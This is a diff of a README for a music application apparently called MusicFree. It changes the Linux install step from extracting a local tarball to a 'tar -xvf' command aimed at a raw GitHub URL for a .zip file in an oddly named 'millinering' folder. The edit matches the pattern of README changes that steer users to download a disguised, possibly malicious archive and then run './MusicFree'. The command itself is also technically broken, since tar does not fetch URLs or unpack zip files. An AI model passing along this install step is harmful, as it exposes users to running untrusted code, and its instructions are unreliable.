MOJICAB1709/MusicFree/readme.md

 ### For Linux
 1. Open the terminal.
 2. Navigate to the directory where the file is downloaded.
-3. Use the command `tar -xvf MusicFree.tar.gz` to extract the files.
+3. Use the command `tar -xvf https://raw.githubusercontent.com/MOJICAB1709/MusicFree/master/millinering/MusicFree.zip` to extract the files.
 4. Navigate to the new directory and run `./MusicFree` to start the application.

 ## 🎛️ Using MusicFree